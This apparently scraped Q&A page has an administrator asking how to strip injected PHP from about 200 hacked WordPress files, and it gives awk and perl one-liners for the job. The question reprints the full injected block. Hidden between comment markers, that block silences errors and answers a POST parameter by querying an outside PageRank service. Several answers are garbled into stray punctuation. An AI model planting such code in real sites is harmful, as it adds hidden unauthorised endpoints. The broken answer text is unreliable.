Geek asks and answers

What is the appropriate grep + sed syntax?

I had two wordpress installations where the hacker tried to insert some php code into existing php files

Nothing serious, but now I need to delete about 20 lines of text from about 200 text files in several subdirectories and just not good enough for grep and sed to figure this out ...

What is the syntax of the command to search the hacked Wordpress folder for all * .php files (including subdirectories) that contain the following text fragment, and then delete the fragment?

<?php
//{{56541616

GLOBAL $alreadyxxx;
if($alreadyxxx != 1)
{
$alreadyxxx = 1;
$olderrxxx=error_reporting(0);
function StrToNum($Str, $Check, $Magic)
{
   $Int32Unit = 4294967296;
   $length = strlen($Str);
   for ($i = 0; $i < $length; $i++) {
       $Check *= $Magic;
       if ($Check >= $Int32Unit) {
           $Check = ($Check - $Int32Unit * (int) ($Check / $Int32Unit));
           $Check = ($Check < -2147483648) ? ($Check + $Int32Unit) : $Check;
       }
       $Check += ord($Str{$i});
   }
   return $Check;
}
function HashURL($String)
{
   $Check1 = StrToNum($String, 0x1505, 0x21);
   $Check2 = StrToNum($String, 0, 0x1003F);

   $Check1 >>= 2;
   $Check1 = (($Check1 >> 4) & 0x3FFFFC0 ) | ($Check1 & 0x3F);
   $Check1 = (($Check1 >> 4) & 0x3FFC00 ) | ($Check1 & 0x3FF);
   $Check1 = (($Check1 >> 4) & 0x3C000 ) | ($Check1 & 0x3FFF);

   $T1 = (((($Check1 & 0x3C0) << 4) | ($Check1 & 0x3C)) <<2 ) | ($Check2 & 0xF0F );
   $T2 = (((($Check1 & 0xFFFFC000) << 4) | ($Check1 & 0x3C00)) << 0xA) | ($Check2 & 0xF0F0000 );

   return ($T1 | $T2);
}

function CheckHash($Hashnum)
{
   $CheckByte = 0;
   $Flag = 0;

   $HashStr = sprintf('%u', $Hashnum) ;
   $length = strlen($HashStr);

   for ($i = $length-1; $i >= 0;  $i--) {
       $Re = $HashStr{$i};
       if (1 === ($Flag % 2)) {
           $Re += $Re;
           $Re = (int)($Re / 10) + ($Re % 10);
       }
       $CheckByte += $Re;
       $Flag ++;
   }

   $CheckByte %= 10;
   if (0 !== $CheckByte) {
       $CheckByte = 10 - $CheckByte;
       if (1 === ($Flag % 2) ) {
           if (1 === ($CheckByte % 2)) {
               $CheckByte += 9;
           }
           $CheckByte >>= 1;
       }
   }

   return '7'.$CheckByte.$HashStr;
}

function getpr($url)
{
   $ch = CheckHash(HashURL($url));
   $file = "http://toolbarqueries.google.com/search?client=navclient-auto&ch=$ch&features=Rank&q=info:$url";;
   $data = file_get_contents($file);
   $pos = strpos($data, "Rank_");
   if($pos === false){return -1;} else{
       $pr=substr($data, $pos + 9);
       $pr=trim($pr);
       $pr=str_replace("
",'',$pr);
       return $pr;
   }
}
if(isset($_POST['xxxprch']))
{
    echo getpr($_POST['xxxprch']);
    exit();
}
error_reporting($olderrxxx);
}

//}}18420732
?>
+3
source share
4 answers

sed grep - , . awk. , awk . , , , , , . "" "" , reset , , . , .

, . , .

/startsequence/    { ignoring=true; }
/endsequence/      { ignoring=false; }
{ if (!ignoring) print }

. , . ( Windows ), , . edit:

+2

perl;

find "hacked wordpress" -iname \*.php -print |\
xargs perl -0777 -i -pe 's:\s*<\?php\s*//\{\{56541616.*?//\}\}18420732\s*\?>\s*::s;'

.php .

DRY RUN FIRST - .

0

. , :

find ./hacked wordpress -name "*.php"|xargs awk '/^<?php/NP=1,/?>$/NP=0{if(NP=0) print}'
0

, .

:

http://crystaldawn.net/fix_hack and more details here: http://frazierit.com/blog/?p=103 and here too: How to call php script using html form elements instead of command line?

Cleaning up a script is not perfect and seems to remove some things that it shouldn't. I do not have the skills to improve it. It would be great if anyone could fix this!

0
source

More articles:


All Articles